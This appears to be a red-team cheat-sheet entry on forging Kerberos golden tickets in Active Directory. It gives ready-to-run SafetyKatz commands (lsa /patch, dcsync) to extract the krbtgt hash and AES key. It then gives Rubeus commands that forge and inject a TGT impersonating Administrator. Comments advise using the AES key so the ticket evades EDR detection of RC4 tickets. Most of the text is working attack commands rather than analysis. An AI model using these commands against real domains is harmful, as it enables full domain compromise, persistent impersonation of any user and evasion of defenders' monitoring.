# golden-ticket

A golden ticket is a forged TGT: it is signed and encrypted with the secret of the `krbtgt` account (the NT hash or, for better OPSEC, the AES-256 key), so the KDC accepts it as a valid TGT. Whoever holds the `krbtgt` secret can therefore impersonate any user with any group memberships, from any machine, including one that is not domain-joined. The ticket stays usable until the `krbtgt` password has been rotated twice, since the KDC still honours tickets encrypted with the previous key.

## Methodology

1. Retrieve the AES-256 key of the `krbtgt` account.
2. Forge and inject the ticket.
3. Impersonate any user.

## Binaries

> [!INFO] Remember to follow the Binaries methodology

## SafetyKatz

**Retrieve the AES-256 key of the `krbtgt` account:**

```batchfile
:: lsa /patch runs on the DC itself and returns NT hashes only; for the Kerberos keys use
:: lsadump::lsa /inject /name:krbtgt there, or dcsync (below) from any host with DCSync rights
SafetyKatz.exe '"lsadump::lsa /patch"'
:: dcsync replicates the account over DRSUAPI and returns the NT hash and the AES keys
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'
```

## Rubeus

**Forge a golden ticket with similar attributes to a normal TGT:**

```batchfile
:: /sid is the domain SID; /ldap pulls the user's real attributes from AD so the PAC looks like a normal TGT's
:: With the NT hash: the TGT is RC4-encrypted (etype 23), which stands out in 4768/4769 logs (usually flagged by EDRs)
Rubeus.exe golden /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt

:: With the AES-256 key: the TGT uses etype 18, the same as a real TGT (Admin cmd required)
Rubeus.exe golden /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt
```
